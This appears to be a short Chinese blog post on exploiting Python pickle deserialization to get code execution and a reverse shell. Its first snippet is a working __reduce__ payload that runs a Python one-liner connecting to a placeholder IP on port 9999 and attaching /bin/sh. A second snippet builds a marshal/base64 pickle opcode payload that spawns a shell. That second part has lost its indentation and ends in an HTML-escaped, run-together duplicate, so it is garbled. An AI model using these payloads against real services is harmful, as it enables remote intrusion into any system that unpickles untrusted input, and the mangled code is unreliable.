pickle反序列化执行代码反弹 shell
字数 528 2022-08-28 12:42:06
  • 使用__reduce__魔术方法执行
import pickle
import os
class A(object):
    def __reduce__(self):
        a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
        return (os.system,(a,))    
a=A()
result = pickle.dumps(a)
pickle.loads(result)
  • 使用marshal自定义方法并构造匿名方法对象执行
import pickle
import marshal
import base64

def foo():

import os

def fib(n):

if n <= 1:

return n

return fib(n-1) + fib(n-2)

print 'fib(10) =', fib(10)

os.system('/bin/sh')


code_serialized = base64.b64encode(marshal.dumps(foo.func_code))

print code_serialized


import marshal

import base64


def foo():

pass # Your code here


print """ctypes

FunctionType

(cmarshal

loads

(cbase64

b64decode

(S'%s'

tRtRc__builtin__

globals

(tRS''

tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))


def foo(): import os def fib(n): if n &lt;= 1: return n return fib(n-1) + fib(n-2) print &#x27;fib(10) =&#x27;, fib(10) os.system(&#x27;&#x2F;bin&#x2F;sh&#x27;) code_ serialized = base64.b64encode(marshal.dumps(foo.func_ code)) print code_ serialized import marshal import base64 def foo(): pass # Your code here print &quot;&quot;&quot;ctypes FunctionType (cmarshal loads (cbase64 b64decode (S&#x27;%s&#x27; tRtRc__ builtin__ globals (tRS&#x27;&#x27; tR(tR.&quot;&quot;&quot; % base64.b64encode(marshal.dumps(foo.func_ code))